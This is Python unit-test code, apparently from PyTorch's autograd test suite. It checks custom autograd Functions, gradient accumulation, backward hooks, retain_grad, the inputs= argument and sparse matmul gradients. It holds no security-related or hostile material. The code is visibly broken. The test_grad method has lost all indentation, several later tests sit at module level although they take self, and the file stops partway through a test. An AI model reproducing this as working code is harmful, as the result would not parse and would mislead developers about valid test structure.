            # Accessing .grad on leaf
            dummy.requires_grad_()
            foo = dummy.grad
            self.assertEqual(len(w), 0)

            # Accessing .grad on non-leaf
            dummy = dummy.clone()
            foo = dummy.grad
            self.assertEqual(len(w), 1)

            # Accessing .grad on non-leaf that retains gradients
            dummy.retain_grad()
            foo = dummy.grad
            self.assertEqual(len(w), 1)
    def _function_test(self, cls):
        """Shared driver: apply *cls* to (x, 2, y), double-backward through
        the sum, and check the analytic gradients.  Returns (x, y)."""
        x = torch.randn(5, 5, requires_grad=True)
        y = torch.randn(5, 5, requires_grad=True)
        result = cls.apply(x, 2, y)
        go = torch.ones((), requires_grad=True)
        result.sum().backward(go, create_graph=True)

        self.assertEqual(x.grad, y + torch.ones(5, 5))
        self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
        self.assertIsNotNone(x.grad.grad_fn)
        self.assertIsNotNone(y.grad.grad_fn)

        return x, y
    def test_function(self):
        """Custom Function forward/backward round-trip plus expected
        double-backward graph structure."""
        class MyFunction(Function):

            @staticmethod
            def forward(ctx, tensor1, pyscalar, tensor2):
                ctx.pyscalar = pyscalar
                ctx.save_for_backward(tensor1, tensor2)
                return tensor1 + pyscalar * tensor2 + tensor1 * tensor2

            @staticmethod
            def backward(ctx, grad_output):
                var1, var2 = ctx.saved_tensors
                # NOTE: self is the test case here
                self.assertIsInstance(var1, torch.Tensor)
                self.assertIsInstance(var2, torch.Tensor)
                self.assertIsInstance(grad_output, torch.Tensor)
                return (grad_output + grad_output * var2, None,
                        grad_output * ctx.pyscalar + grad_output * var1)

        x, y = self._function_test(MyFunction)

        x_grad_desc = graph_desc(x.grad.grad_fn)
        y_grad_desc = graph_desc(y.grad.grad_fn)
        self.assertExpected(x_grad_desc, "x_grad_desc")
        self.assertExpected(y_grad_desc, "y_grad_desc")
    def test_once_differentiable(self):
        """@once_differentiable backward runs with grad disabled and its
        double-backward graph degrades to Error nodes."""
        class MyFunction(Function):

            @staticmethod
            def forward(ctx, tensor1, pyscalar, tensor2):
                ctx.pyscalar = pyscalar
                ctx.save_for_backward(tensor1, tensor2)
                return tensor1 + pyscalar * tensor2 + tensor1 * tensor2

            @staticmethod
            @once_differentiable
            def backward(ctx, grad_output):
                self.assertFalse(torch.is_grad_enabled())
                t1, t2 = ctx.saved_tensors
                return (grad_output + grad_output * t2, None,
                        grad_output * ctx.pyscalar + grad_output * t1)

        x, y = self._function_test(MyFunction)
        self.assertEqual(graph_desc(x.grad.grad_fn),
                         'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
        self.assertEqual(graph_desc(y.grad.grad_fn),
                         'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
    def test_function_returns_input(self):
        """A Function returning its input unmodified still routes gradients
        through its backward (for both 1-d and scalar shapes)."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x

            @staticmethod
            def backward(ctx, grad):
                return grad * 2

        for shape in [(1,), ()]:
            v = torch.ones(shape, requires_grad=True)
            MyFunction.apply(v).backward()
            self.assertEqual(v.grad, torch.full(shape, 2.))

            with torch.no_grad():
                v.grad.zero_()
            MyFunction.apply(v.clone()).backward()
            self.assertEqual(v.grad, torch.full(shape, 2.))
    def test_function_returns_undefined_tensor(self):
        """None gradients from a custom backward propagate as undefined
        (grad stays None) rather than becoming zero tensors."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x * 2

            @staticmethod
            def backward(ctx, grad):
                return None

        # Test that undefined tensors returned from custom backward function
        # are propagated as undefined and not tensor full of zeroes
        x = torch.ones(1, requires_grad=True)
        MyFunction.apply(x).backward()
        self.assertIsNone(x.grad)

        MyFunction.apply(x ** 2).backward()
        self.assertIsNone(x.grad)

        MyFunction.apply(x).sum().backward()
        self.assertIsNone(x.grad)

        self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
    def test_materialize_grads(self):
        """By default an undefined incoming grad is materialized as zeros."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x

            @staticmethod
            def backward(ctx, grad):
                self.assertEqual(grad, torch.zeros(1))
                return grad

        x = torch.ones(1, requires_grad=True)
        # UndefinedGrad feeds an undefined gradient into MyFunction.backward.
        torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
    def test_dont_materialize_grads(self):
        """set_materialize_grads(False) lets backward see None instead of
        a zero-filled gradient."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                ctx.set_materialize_grads(False)
                return x

            @staticmethod
            def backward(ctx, grad):
                self.assertIsNone(grad)
                return grad

        x = torch.ones(1, requires_grad=True)
        torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
    def test_legacy_function_deprecation_exception(self):
        """Legacy (non-static forward) Function usage raises RuntimeError."""
        # Trigger exception
        class MyFunction(Function):
            def forward(self, x):
                return x

            def backward(self, grad_output):
                return grad_output

        # Check exception occurs
        with self.assertRaisesRegex(
                RuntimeError,
                'Legacy autograd function with non-static forward method is deprecated'):
            MyFunction()(torch.randn(3, 4))
    class SimulateBackwardError(Function):
        """Identity Function whose backward always raises; used by the
        error-propagation tests below."""

        @staticmethod
        def forward(ctx, input):
            return input.clone()

        @staticmethod
        @once_differentiable
        def backward(ctx, input):
            raise Exception("Simulate error on backward pass")
    def test_custom_function_exception(self):
        """An exception raised in a custom backward surfaces from .backward()."""
        t1 = torch.rand((3, 3), requires_grad=True)
        t2 = torch.rand((3, 3), requires_grad=True)

        tmp = (t1 + t2) * (t1 + t2)
        t3 = TestAutograd.SimulateBackwardError.apply(tmp)
        with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
            t3.sum().backward()
    def test_custom_function_non_tensor_inputs_outputs(self):
        """Custom Functions may mix tensor and non-tensor inputs/outputs;
        non-tensor outputs get None gradients and gradcheck still passes."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, t1, t2, scale, t3):
                t4 = t1 + t2 * t3
                t5 = t1 * t2 + t3
                t4 *= scale
                t5 *= scale

                # Save scale
                ctx.scale = scale
                ctx.save_for_backward(t1, t2, t3)
                return scale, t4, None, True, t5, "bar", t1

            @staticmethod
            @once_differentiable
            def backward(ctx, *grads):
                # Verify grads
                self.assertEqual(7, len(grads))
                self.assertIsNone(grads[0])
                self.assertIsNone(grads[2])
                self.assertIsNone(grads[3])
                self.assertIsNone(grads[5])

                scale = ctx.scale
                var1, var2, var3 = ctx.saved_tensors
                return (
                    grads[1] * scale + grads[4] * var2 * scale + grads[6],
                    grads[1] * var3 * scale + grads[4] * var1 * scale,
                    None,
                    grads[1] * var2 * scale + grads[4] * scale,
                )

        t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
        t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
        t3 = torch.rand(10, dtype=torch.double)
        scale = random.randint(0, 10)
        res = MyFunction.apply(t1, t2, scale, t3)
        self.assertEqual(scale, res[0])
        self.assertEqual((t1 + t2 * t3) * scale, res[1])
        self.assertEqual(None, res[2])
        self.assertEqual(True, res[3])
        self.assertEqual((t1 * t2 + t3) * scale, res[4])
        self.assertEqual("bar", res[5])
        self.assertEqual(t1, res[6])

        # Validate running backward.
        torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
        self.assertIsNotNone(t1.grad)
        self.assertIsNotNone(t2.grad)
        self.assertIsNone(t3.grad)

        # Test gradcheck
        def foo(t1, t2, t3):
            res = MyFunction.apply(t1, t2, scale, t3)
            return res[1], res[4], res[6]

        gradcheck(foo, (t1, t2, t3))
    def test_custom_function_no_tensors(self):
        """A custom Function applied to plain Python numbers (no tensors at
        all) still returns its outputs unchanged."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, t1, t2, scale, t3):
                t4 = t1 + t2 * t3
                t5 = t1 * t2 + t3
                t4 *= scale
                t5 *= scale
                return scale, t4, None, True, t5, "bar", t1

            @staticmethod
            @once_differentiable
            def backward(ctx, *args):
                return (args[0], args[1], None, args[2])

        t1 = random.random()
        t2 = random.random()
        t3 = random.random()
        scale = random.randint(0, 10)
        res = MyFunction.apply(t1, t2, scale, t3)
        self.assertEqual(scale, res[0])
        self.assertEqual((t1 + t2 * t3) * scale, res[1])
        self.assertEqual(None, res[2])
        self.assertEqual(True, res[3])
        self.assertEqual((t1 * t2 + t3) * scale, res[4])
        self.assertEqual("bar", res[5])
        self.assertEqual(t1, res[6])
    def test_invalid_gradients(self):
        """A backward returning a wrongly-shaped gradient raises RuntimeError."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x * 2

            @staticmethod
            def backward(ctx, grad_output):
                # Deliberately wrong shape: input is 5x5, this returns 10.
                return torch.randn(10, dtype=torch.float)

        with self.assertRaisesRegex(RuntimeError, 'expected shape'):
            input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
            MyFunction.apply(input).sum().backward()
    def test_accumulate_grad(self):
        """Gradient accumulation is in-place without create_graph and
        out-of-place with it (so the old .grad tensor is left untouched)."""
        grad_output = torch.ones(5, 5)

        def compute_grad(create_graph):
            x = torch.randn(5, 5, requires_grad=True)
            y = x + 2
            y.backward(grad_output, retain_graph=True)
            x_grad = x.grad
            x_grad_clone = x.grad.clone()
            y.backward(grad_output, create_graph=create_graph)
            return x_grad, x_grad_clone

        # Accumulate in-place when create_graph is False
        x_grad, x_grad_clone = compute_grad(create_graph=False)
        self.assertEqual(x_grad, x_grad_clone * 2)

        # Accumulate out-of-place when create_graph is True
        # (comment fixed: it previously said "False", contradicting the call)
        x_grad, x_grad_clone = compute_grad(create_graph=True)
        self.assertEqual(x_grad, x_grad_clone)
    def test_accumulate_grad_tensor_reference(self):
        """Whether accumulation preserves the identity of .grad depends on
        sparse/dense layout combinations and create_graph."""
        def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
            params = torch.tensor([1.5, 1.5]).requires_grad_()
            params.grad = params_grad_tensor
            grad_saved = params.grad
            params.backward(backward_grad_tensor, create_graph=create_graph)
            self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)

        for create_graph in (False, True):
            # Accumulate dense gradient to sparse gradient will change the `params.grad` reference
            _test_grad_tensor(
                torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
                torch.tensor([1.5, 1.5]),
                False,  # never accumulates in-place
                create_graph)

            # Accumulate dense gradient to dense gradient will preserve the `params.grad` reference,
            # but only if create_graph=False.
            _test_grad_tensor(
                torch.tensor([1.5, 1.5]),
                torch.tensor([1.5, 1.5]),
                not create_graph,
                create_graph)

            # Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference,
            # but only if create_graph=False.
            _test_grad_tensor(
                torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
                torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
                not create_graph,
                create_graph)
    @skipIfNoLapack
    def test_slogdet_sign(self):
        """slogdet's sign output requires no grad, yet computations using
        it still backpropagate correctly for both determinant signs."""
        a = torch.randn(3, 3, dtype=torch.double, requires_grad=True)
        s, logdet = a.slogdet()

        # test that sign should not require grad
        self.assertFalse(s.requires_grad)

        # test that backward through computation involving sign works
        def sign_mul_logdet(mat):
            s, logdet = mat.slogdet()
            return s * logdet

        u, s, v = a.detach().svd()
        s.abs_().clamp_(0.0001)
        for sign in (-1, 1):
            # Force the determinant's sign via the smallest singular value.
            s[-1] = sign
            mat = torch.linalg.multi_dot([u, s.diag(), v.t()]).requires_grad_()
            gradcheck(sign_mul_logdet, mat)
            gradgradcheck(sign_mul_logdet, mat)
    def test_sum_to_with_empty_dim_grad(self):
        """Broadcasting against a zero-sized dim yields zero gradients of
        the correct (possibly empty) shapes."""
        a = torch.rand(4, 0, requires_grad=True)
        b = torch.rand(4, 1, requires_grad=True)
        c = a + b
        assert c.shape == (4, 0)
        c.sum().backward()

        self.assertEqual(b.grad, torch.zeros(4, 1))
        self.assertEqual(a.grad, torch.zeros(4, 0))
    def test_hessian_vector(self):
        """Double backward accumulates the Hessian-vector product onto the
        existing first-order gradients."""
        x = torch.randn(2, 2, requires_grad=True)
        y = torch.randn(2, 2, requires_grad=True)

        z = x ** 2 + y * x + y ** 2
        z.backward(torch.ones(2, 2), create_graph=True)

        with torch.no_grad():
            x_grad = 2 * x + y
            y_grad = x + 2 * y
        self.assertEqual(x.grad, x_grad)
        self.assertEqual(y.grad, y_grad)

        grad_sum = 2 * x.grad + y.grad
        grad_sum.backward(torch.ones(2, 2))
        # Analytic Hessian-vector products for the polynomial above.
        x_hv = torch.ones(2, 2) * 5
        y_hv = torch.ones(2, 2) * 4
        self.assertEqual(x.grad, x_grad + x_hv)
        self.assertEqual(y.grad, y_grad + y_hv)
def test_grad(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
x_hv = torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
inputs=[x], create_graph=True)
expected_x_hv = torch.ones(2, 2) * 5
expected_y_hv = torch.ones(2, 2) * 4
self.assertEqual(x_hv[0], expected_x_hv)
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
# Test that grad_outputs and outputs have the same shape
grad_out = torch.ones(2)
try:
torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[grad_out],
inputs=[x], create_graph=True)
self.assertFail()
except RuntimeError as error:
self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
+ str(grad_out.shape) + " and output[0] has a shape of "
+ str(grad_sum.shape) + ".")
    def test_grad_nonleaf(self):
        """Gradient-descent steps via torch.autograd.grad on non-leaf x
        never populate .grad until an explicit backward()."""
        x_init = torch.randn(2, 2, requires_grad=True)
        x = x_init
        y = torch.randn(2, 2, requires_grad=True)
        grad_output = torch.ones(2, 2)

        def fn(x):
            return x ** 2 + y * x + y ** 2

        for _ in range(5):
            grad_x, = torch.autograd.grad(
                fn(x), x, grad_outputs=grad_output, create_graph=True)

            grad_x_expected = 2 * x + y
            self.assertIsNone(y.grad)
            self.assertIsNone(x.grad)
            self.assertEqual(grad_x, grad_x_expected)

            # Gradient-ascent step keeps the graph connected to x_init.
            x = x + 0.05 * grad_x

        val_init = fn(x_init).sum()
        val_final = fn(x).sum()
        self.assertGreater(val_final, val_init)

        x.backward(grad_output)
        self.assertIsNotNone(y.grad)
        self.assertIsNotNone(x_init.grad)
    def test_grad_nonleaf_many_outputs(self):
        """torch.autograd.grad over two chunks of one tensor neither fires
        the tensor's hook nor populates its .grad."""
        # This checks an edge case for function callbacks
        # We want to capture two grads of a function, but can only
        # register a single callback.
        x = torch.randn(4, 2, requires_grad=True)
        a, b = x.chunk(2)

        def hook(*grads):
            hook_called[0] = True
        hook_called = [False]
        x.register_hook(hook)

        go = torch.randn(2, 2)
        grad_a, grad_b = torch.autograd.grad(
            (a + 2 * b), [a, b], grad_outputs=go, create_graph=True)

        self.assertEqual(grad_a, go)
        self.assertEqual(grad_b, go * 2)
        self.assertFalse(hook_called[0])
        self.assertIsNone(x.grad)
    def test_grad_nonleaf_register_hook(self):
        """A hook on one unbind() output fires only for that output's
        backward; other outputs' backwards must not crash or re-fire it."""
        # This checks an edge case for register_hook.
        # We want to capture grad of a nonleaf tensor,
        # but avoid segfault during backward of other nonleaf tensors
        x = torch.randn(5, requires_grad=True)
        x_list = x.unbind()

        x0 = x_list[0]
        hook_results = [None]

        def hook(grad):
            hook_results[0] = grad
        x0.register_hook(hook)

        x_list[0].backward()
        self.assertEqual(hook_results[0], torch.tensor(1.))
        expected_grad = torch.tensor([1., 0, 0, 0, 0])
        self.assertEqual(x.grad, expected_grad)
        self.assertIsNone(x_list[0].grad)

        for i in range(1, 5, 1):
            x_list[i].backward()
            # The hook belongs to x0 only, so it must stay untouched here.
            self.assertEqual(hook_results[0], None)
            expected_grad[i] = 1.0
            self.assertEqual(x.grad, expected_grad)
            self.assertIsNone(x_list[i].grad)
    def test_hook_with_no_name(self):
        """Hooks need not have a __name__ attribute (e.g. callable objects)."""
        # Create a hook that do not have a __name__ attribute
        class MyHookClass:
            def __call__(self, grad):
                return grad.clone()

        x = torch.randn(5, requires_grad=True).clone()
        x.register_hook(MyHookClass())
        x.sum().backward()
        # Should run fine
    def test_sharded_grad(self):
        """Computing intermediate grads in shards then finishing with
        torch.autograd.backward matches the analytic leaf gradients."""
        leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
        intermediates = [l * i + l * l for i, l in enumerate(leaves)]
        loss = sum(v * i for i, v in enumerate(intermediates)).sum()

        # define a helper for dividing intermediates into groups
        def group(l, group_size):
            return (l[i:i + group_size] for i in range(0, len(l), group_size))

        # Compute the d loss / d intermediates in chunks of shard_size
        shard_size = 2
        d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
                           for d_i in torch.autograd.grad(loss, intermediates_batch)]
        # Compute rest of backward pass
        torch.autograd.backward(intermediates, d_intermediates)

        for i, l in enumerate(leaves):
            self.assertEqual(l.grad, i * i * (1 + l))
    def test_backward_badcalls(self):
        """backward() on a tensor that doesn't require grad raises."""
        x = torch.ones(1)
        with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
            x.backward()
    def test_grad_badcalls(self):
        """torch.autograd.grad rejects outputs/inputs that don't require grad."""
        x = torch.ones(1)
        y = x ** 2
        with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
            torch.autograd.grad(x, y)
        with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
            torch.autograd.grad(y, x)

        x = torch.ones(1, requires_grad=True)
        y = x ** 2
        torch.autograd.grad(y, x)  # this should succeed now
    def test_grad_fn_badcalls(self):
        """Calling a grad_fn with the wrong arity raises TypeError."""
        error_regex = 'expected .* arguments, got .* instead'
        x = torch.ones(1, requires_grad=True)
        y = x ** 2
        with self.assertRaisesRegex(TypeError, error_regex):
            y.grad_fn(x.detach(), x.detach())  # too many
        with self.assertRaisesRegex(TypeError, error_regex):
            y.grad_fn()  # too few

        y.grad_fn(x.detach())  # this should succeed
    def test_grad_unreachable(self):
        """Inputs unreachable from the outputs yield None with
        allow_unused=True and raise with allow_unused=False."""
        x = torch.ones(1, requires_grad=True)
        y = torch.ones(1, requires_grad=True)
        # Make sure x and y have grad accumulators allocated
        z = x * 2
        w = y * 2

        grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True)
        self.assertEqual(grad_x, x * 2)
        self.assertIsNone(grad_y)

        # This is slightly different than the case above, because z doesn't even
        # have a grad accumulator allocated.
        z = torch.ones(1, requires_grad=True)
        grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True)
        self.assertEqual(grad_x, x * 2)
        self.assertIsNone(grad_z)

        # allow_unused=False, but grads contains None inside, should throw
        with self.assertRaisesRegex(RuntimeError,
                                    "Set allow_unused=True"):
            grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False)
    def test_grad_unreachable_discovery(self):
        """Nodes not on any path to the requested inputs must not execute."""
        # Test that certain nodes are not erroneously executed when an input
        # is unreachable. See #39784
        class MyFunc(torch.autograd.Function):
            @staticmethod
            def forward(ctx, x):
                return x

            @staticmethod
            def backward(ctx, x):
                self.fail("This node should not be executed!")

        x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
        y = torch.randn(1, requires_grad=True)
        (gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
        self.assertIsNone(gY)

        x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
        y = torch.randn(1, requires_grad=True)
        z = torch.randn(1, requires_grad=True)
        (gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
        self.assertIsNone(gY)
        self.assertIsNotNone(gZ)

        x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
        y = torch.randn(1, requires_grad=True)
        torch.autograd.backward(x, inputs=(y, ))  # allow_unused is implicitly True!
        self.assertIsNone(y.grad)
    def test_hooks(self):
        """Hook registration/removal counts fire correctly, and modifying
        hooks scale gradients as expected."""
        x = torch.ones(5, 5, requires_grad=True)
        y = torch.ones(5, 5) * 4
        y.requires_grad_(True)

        counter = [0]

        def bw_hook(inc, grad):
            self.assertIsInstance(grad, torch.Tensor)
            counter[0] += inc

        z = x ** 2 + x * 2 + x * y + y
        x.register_hook(lambda *args: bw_hook(0, *args))
        test = z.register_hook(lambda *args: bw_hook(1, *args))
        z.backward(torch.ones(5, 5), retain_graph=True)
        self.assertEqual(counter[0], 1)

        test2 = z.register_hook(lambda *args: bw_hook(2, *args))
        z.backward(torch.ones(5, 5), retain_graph=True)
        self.assertEqual(counter[0], 4)

        test2.remove()
        z.backward(torch.ones(5, 5), retain_graph=True)
        self.assertEqual(counter[0], 5)

        def bw_hook_modify(grad):
            return grad.mul(2)

        test.remove()
        z.register_hook(bw_hook_modify)
        with torch.no_grad():
            y.grad.zero_()
        z.backward(torch.ones(5, 5), retain_graph=True)
        self.assertEqual(y.grad, (x + 1) * 2)

        y.register_hook(bw_hook_modify)
        with torch.no_grad():
            y.grad.zero_()
        z.backward(torch.ones(5, 5))
        # Both z's and y's modifying hooks apply: gradient doubled twice.
        self.assertEqual(y.grad, (x + 1) * 4)
    def test_hooks_cpp(self):
        """Hooks also fire for autograd functions implemented in C++."""
        # Tests hooks for autograd function implemented in C++
        bn = torch.nn.BatchNorm1d(5, affine=False)
        bn.double()
        bn.eval()

        counter = [0]

        def bw_hook(grad):
            counter[0] += 1
            return grad * 2

        x = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
        z = bn(x)
        z.register_hook(bw_hook)
        z.sum().backward()

        self.assertEqual(counter[0], 1, msg='bw_hook not called')
        self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
    def test_hook_none(self):
        """Hooks never receive None even when a Function returns a None
        gradient for one of its outputs."""
        # WARNING: this is a test for autograd internals.
        # You should never have to use such things in your code.
        class NoneGradientFunction(Function):
            @staticmethod
            def forward(ctx, x, y):
                assert ctx.needs_input_grad[0]
                assert not ctx.needs_input_grad[1]
                return x, y

            @staticmethod
            def backward(ctx, grad_x, grad_y):
                return grad_x, None

        was_called = [False]

        def hook(grad):
            self.assertIsNotNone(grad)
            was_called[0] = True

        x = torch.randn(5, 5, requires_grad=True)
        y = torch.randn(5, 5)
        rx, ry = NoneGradientFunction.apply(x, y)
        rx.register_hook(hook)
        ry.register_hook(hook)
        # NOTE(review): builtin sum(rx, ry) iterates rx's rows with ry as the
        # start value — looks intentional here but worth confirming it isn't
        # meant to be (rx + ry).
        sum(rx, ry).sum().backward()
        self.assertTrue(was_called[0])
    def test_retain_grad(self):
        """retain_grad() accumulates into a non-leaf's .grad; calling it
        repeatedly or on leaves is a no-op."""
        input = torch.rand(1, 3, requires_grad=True)
        h1 = input * 3
        out = (h1 * h1).sum()

        # It should be possible to call retain_grad() multiple times
        h1.retain_grad()
        h1.retain_grad()

        # Gradient should be accumulated
        out.backward(retain_graph=True)
        self.assertEqual(h1 * 2, h1.grad)
        out.backward(retain_graph=True)
        self.assertEqual(h1 * 4, h1.grad)

        with torch.no_grad():
            input.grad.zero_()
        # It should be a no-op for leaves
        input.retain_grad()
        input.retain_grad()
        out.backward()
        self.assertEqual(input * 18, input.grad)
    def test_retain_grad_cycle(self):
        """retain_grad() must not create a reference cycle keeping the
        tensor alive after it goes out of scope."""
        x = torch.ones(5, 5, requires_grad=True)

        def run_test():
            y = x * 2
            y.retain_grad()

            return y / 2, torch._C._WeakTensorRef(y)

        z, ref = run_test()
        # y should be collectible once run_test returns...
        self.assertTrue(ref.expired())
        # ...while backward through the surviving graph still works.
        z.sum().backward()
    def test_backward(self):
        """backward() through a rational polynomial matches the analytic
        partial derivatives."""
        v = torch.randn(5, 5, requires_grad=True)
        x = torch.randn(5, 5, requires_grad=True)
        # y is shifted away from zero since it appears in denominators.
        y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
        z = torch.randn(5, 5, requires_grad=True)
        grad_output = torch.randn(5, 5)

        v.backward(grad_output)
        self.assertEqual(v.grad, grad_output)

        a = x + (y * z) + 4 * z ** 2 * x / y
        a.backward(grad_output)
        x_grad = 4 * z.pow(2) / y + 1
        y_grad = z - 4 * x * z.pow(2) / y.pow(2)
        z_grad = 8 * x * z / y + y
        self.assertEqual(x.grad, x_grad * grad_output)
        self.assertEqual(y.grad, y_grad * grad_output)
        self.assertEqual(z.grad, z_grad * grad_output)
    def test_sparse_mm_backward(self):
        """Sparse matmul backward: unsupported sparse-grad combinations
        raise, and supported ones match the all-dense result."""
        size = (3, 3)
        sparse = torch.sparse_coo_tensor(size, requires_grad=True)
        dense = torch.randn(size, requires_grad=True)

        with self.assertRaisesRegex(
                RuntimeError,
                "The backward pass for this operation requires the 'mat1' tensor to be strided,"):
            z = dense.addmm(sparse, dense)

        mm_test_cases = [
            # a requires grad, a is sparse, b requires grad, b is sparse, error message
            (False, True, True, False, None),
            (False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
            (False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
            (True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
            (True, True, False, False, "The backward pass for this operation requires the 'self'"),
            (True, True, True, False, "The backward pass for this operation requires the 'self'"),
            (True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
        ]
        for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
            # We should only be testing cases with sparse inputs, and at least one
            # input needs to require grad so we can call a backward pass
            assert a_is_sparse or b_is_sparse
            assert a_req_grad or b_req_grad

            a = torch.randn(size, requires_grad=a_req_grad)
            if a_is_sparse:
                a = a.to_sparse()
            b = torch.randn(size, requires_grad=b_req_grad)
            if b_is_sparse:
                b = b.to_sparse()

            # If no error expected, check that sparse and dense cases match
            if err_msg is None:
                r = a.mm(b)
                r.sum().backward()
                a_grad = None if a.grad is None else a.grad.clone().detach()
                b_grad = None if b.grad is None else b.grad.clone().detach()

                # Redo with only dense tensors
                a = (a.to_dense() if a.is_sparse else a).clone().detach()
                a.requires_grad = a_req_grad
                b = (b.to_dense() if b.is_sparse else b).clone().detach()
                b.requires_grad = b_req_grad

                r = a.mm(b)
                r.sum().backward()

                self.assertEqual(a_grad, a.grad)
                self.assertEqual(b_grad, b.grad)
            else:
                with self.assertRaisesRegex(RuntimeError, err_msg):
                    a.mm(b)
def test_multi_backward(self):
    """Backprop through two roots at once; every leaf, including the one
    shared by both roots, must receive the correct accumulated grad."""
    x, y, q, a, b = (torch.randn(5, 5, requires_grad=True) for _ in range(5))

    doubled_q = q * 2
    z = x + y + doubled_q
    c = a * b + doubled_q

    gz = torch.randn(5, 5)
    gc = torch.randn(5, 5)
    torch.autograd.backward([z, c], [gz, gc])

    self.assertEqual(x.grad, gz)
    self.assertEqual(y.grad, gz)
    self.assertEqual(a.grad, gc * b)
    self.assertEqual(b.grad, gc * a)
    # q feeds both roots through q*2, so its grad is the sum, times 2.
    self.assertEqual(q.grad, (gc + gz) * 2)
def test_multi_backward_no_grad(self):
    """backward() must reject a root that does not require grad."""
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5, requires_grad=False)

    z = x + y
    q = y * 2

    # NB: we currently raise an exception if any arguments to backwards
    # have requires_grad=False and don't have a grad_fn. We may want to
    # relax that check to a warning.
    grads = [torch.ones(5, 5), torch.ones(5, 5)]
    self.assertRaises(RuntimeError,
                      lambda: torch.autograd.backward([z, q], grads))
def test_backward_with_inputs(self):
    """backward(..., inputs=...) must accumulate grads only into `inputs`."""
    x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)

    def fn():
        # Rebuild the graph for every backward so each run starts fresh.
        return x ** 2 + y * x + y ** 2

    gradient = torch.ones(2, 2)
    x_grad_expected = 2 * x + y
    y_grad_expected = x + 2 * y

    @torch.no_grad()
    def reset_grad():
        x.grad.zero_()
        y.grad.zero_()

    torch.autograd.backward(fn(), gradient, inputs=[x, y])
    self.assertEqual(x.grad, x_grad_expected)
    self.assertEqual(y.grad, y_grad_expected)

    reset_grad()
    torch.autograd.backward(fn(), gradient, inputs=[x])
    self.assertEqual(x.grad, x_grad_expected)
    # y was excluded from `inputs`, so its zeroed grad must stay zero.
    self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)

    reset_grad()
    torch.autograd.backward(fn(), gradient, inputs=[y])
    self.assertEqual(y.grad, y_grad_expected)
    self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)

    reset_grad()
    # A bare tensor (not wrapped in a list) is also accepted as `inputs`.
    torch.autograd.backward(fn(), gradient, inputs=y)
    self.assertEqual(y.grad, y_grad_expected)
    self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)

    reset_grad()
    self.assertRaisesRegex(RuntimeError, 'cannot be empty',
                           lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
    """`inputs=` must reject non-leaf tensors and silently skip tensors
    that are not part of the graph."""
    x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    x_nonleaf = x * 1
    y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)

    out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2

    out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y])
    x_grad_expected = 2 * x + y
    y_grad_expected = x + 2 * y

